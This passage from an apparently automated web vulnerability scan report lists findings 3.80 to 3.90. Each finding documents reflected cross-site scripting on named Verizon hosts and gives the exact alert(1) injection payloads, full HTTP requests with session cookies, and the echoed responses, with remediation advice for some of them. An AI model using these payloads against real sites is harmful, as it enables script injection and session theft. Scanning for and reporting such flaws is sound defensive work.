3.80. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [webex parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the webex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a690"><script>alert(1)</script>2618c9bf78 was submitted in the webex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=8a690"><script>alert(1)</script>2618c9bf78&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:57:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=8a690"><script>alert(1)</script>2618c9bf78&search=" target="_top">
...[SNIP]...

3.81. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [webhosting parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the webhosting request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60f4c"><script>alert(1)</script>718101defe9 was submitted in the webhosting parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=60f4c"><script>alert(1)</script>718101defe9&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:57:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
opservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=60f4c"><script>alert(1)</script>718101defe9&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.82. http://syndicate.verizon.net/ads/js.ashx [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.verizon.net
Path:   /ads/js.ashx

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63c88\'%3balert(1)//ae87b284984 was submitted in the page parameter. This input was echoed as 63c88\\';alert(1)//ae87b284984 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/js.ashx?page=shopvz.net/homepage63c88\'%3balert(1)//ae87b284984&pos=Right,Right1 HTTP/1.1
Host: syndicate.verizon.net
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/Shop/Utilities/verizonyourdomain.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2cgrvsiuxtasbv552h1j3v45; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 2723
Date: Sat, 20 Nov 2010 02:06:45 GMT
Connection: close

//Copyright (c) 2000-2003 by 24/7 Real Media, Inc. ALL RIGHTS RESERVED. 3/13/2008
//New changes made on 06/25 and pushed to fuat on 06/25
//configuration
OAS_url = 'http://oascentral.verizononline.com/RealMedia/ads/';
OAS_sitepage = 'shopvz.net/homepage63c88\\';alert(1)//ae87b284984';
OAS_listpos = 'Right,Right1';
OAS_query = 'popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&
...[SNIP]...

3.83. http://syndicate.verizon.net/ads/js.ashx [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.verizon.net
Path:   /ads/js.ashx

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e25b\'%3balert(1)//34bbd0c359d was submitted in the pos parameter. This input was echoed as 2e25b\\';alert(1)//34bbd0c359d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/js.ashx?page=shopvz.net/homepage&pos=Right,Right12e25b\'%3balert(1)//34bbd0c359d HTTP/1.1
Host: syndicate.verizon.net
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/Shop/Utilities/verizonyourdomain.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2cgrvsiuxtasbv552h1j3v45; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 2723
Date: Sat, 20 Nov 2010 02:06:46 GMT
Connection: close

//Copyright (c) 2000-2003 by 24/7 Real Media, Inc. ALL RIGHTS RESERVED. 3/13/2008
//New changes made on 06/25 and pushed to fuat on 06/25
//configuration
OAS_url = 'http://oascentral.verizononline.com/RealMedia/ads/';
OAS_sitepage = 'shopvz.net/homepage';
OAS_listpos = 'Right,Right12e25b\\';alert(1)//34bbd0c359d';
OAS_query = 'popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&vi
...[SNIP]...

3.84. http://wapp.verizon.net/bookmarks/bmredirex.asp [WT.ti parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /bookmarks/bmredirex.asp

Issue detail

The value of the WT.ti request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c748"%3balert(1)//a814480360d was submitted in the WT.ti parameter. This input was echoed as 9c748";alert(1)//a814480360d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmarks/bmredirex.asp?bm=webt_vzsurround&WT.ti=Central/Header/vzsurround_lnkout9c748"%3balert(1)//a814480360d HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.verizon.net/central/appmanager/portal/vzcentral
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 152
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:48:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:48:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=T2NHMnySvcZpqX6wZM4gwP0QdlsfW8NSqTwB5vsX8vvGTd9mcWpV!133454377; path=/


<script>
   window.location = "http://surround.verizon.net?WT.ti=Central/Header/vzsurround_lnkout9c748";alert(1)//a814480360d";
</script>

3.85. http://wapp.verizon.net/bookmarks/bmredirex.asp [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /bookmarks/bmredirex.asp

Issue detail

The value of the channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e80cd"%3balert(1)//130ab0744e1 was submitted in the channel parameter. This input was echoed as e80cd";alert(1)//130ab0744e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmarks/bmredirex.asp?bm=goo_search&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmre80cd"%3balert(1)//130ab0744e1 HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:09:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:09:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=2yWNMntR2VP6ScZhsjs316DnrdJyKR4tNT4KFC3Tlgw3M6qTrYxC!-16130884; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmre80cd";alert(1)//130ab0744e1";
</script>

3.86. http://wapp.verizon.net/bookmarks/bmredirex.asp [clientid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /bookmarks/bmredirex.asp

Issue detail

The value of the clientid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee502"%3balert(1)//be7a3cddcbe was submitted in the clientid parameter. This input was echoed as ee502";alert(1)//be7a3cddcbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmarks/bmredirex.asp?bm=goo_search&q='&web_search_type=basic&clientid=cnsmree502"%3balert(1)//be7a3cddcbe&channel=Nwcnsmr HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:09:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:09:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=49hPMnthQRfmJYvnpJ7YLhQRMxK64N2vwmLvCfHFQqf4VKnbKGQy!-552517484; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic&clientid=cnsmree502";alert(1)//be7a3cddcbe&channel=Nwcnsmr";
</script>

3.87. http://wapp.verizon.net/bookmarks/bmredirex.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /bookmarks/bmredirex.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f54c1"%3balert(1)//67e8173d08d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f54c1";alert(1)//67e8173d08d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmarks/bmredirex.asp?bm=webt_vzsurround&WT.ti=Central/Header/vzsurround_lnkout&f54c1"%3balert(1)//67e8173d08d=1 HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.verizon.net/central/appmanager/portal/vzcentral
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 155
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:48:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:48:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=6WMRMnpLcT21tTHQ614mJtX0tcZp14FT8s1Ly11BB1kNqpGpDK6m!-552517484; path=/


<script>
   window.location = "http://surround.verizon.net?WT.ti=Central/Header/vzsurround_lnkout&f54c1";alert(1)//67e8173d08d=1";
</script>

3.88. http://wapp.verizon.net/bookmarks/bmredirex.asp [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /bookmarks/bmredirex.asp

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8b66"%3balert(1)//b6c880b93f7 was submitted in the q parameter. This input was echoed as f8b66";alert(1)//b6c880b93f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmarks/bmredirex.asp?bm=goo_search&q='f8b66"%3balert(1)//b6c880b93f7&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:08:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:08:45 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=QkFsMntNGTxpwFvTMLpddppD4hwQGbGJ0JMQcgH9Hm6mpLK12BHl!-16130884; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='f8b66";alert(1)//b6c880b93f7&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr";
</script>

3.89. http://wapp.verizon.net/bookmarks/bmredirex.asp [web_search_type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /bookmarks/bmredirex.asp

Issue detail

The value of the web_search_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8b1d"%3balert(1)//54879207f6a was submitted in the web_search_type parameter. This input was echoed as d8b1d";alert(1)//54879207f6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmarks/bmredirex.asp?bm=goo_search&q='&web_search_type=basicd8b1d"%3balert(1)//54879207f6a&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 02:09:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:09:08 GMT
Connection: close
Set-Cookie: VZCSESSIONID=3Z6JMntGTjQnpj89SqNJNCqKqk8Q965Xg3t45VjvdyLRx1npqRNk!-552517484; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basicd8b1d";alert(1)//54879207f6a&clientid=cnsmr&channel=Nwcnsmr";
</script>

3.90. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [WT.ti parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /handlers/bookmarks_ex/redirectex.ashx

Issue detail

The value of the WT.ti request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26041"%3balert(1)//db67067f088 was submitted in the WT.ti parameter. This input was echoed as 26041";alert(1)//db67067f088 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /handlers/bookmarks_ex/redirectex.ashx?bm=webt_vzsurround&WT.ti=Central/Header/vzsurround_lnkout26041"%3balert(1)//db67067f088 HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.verizon.net/central/appmanager/portal/vzcentral
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 152
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 01:48:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 01:48:08 GMT
Connection: close
Vary: Accept-Encoding
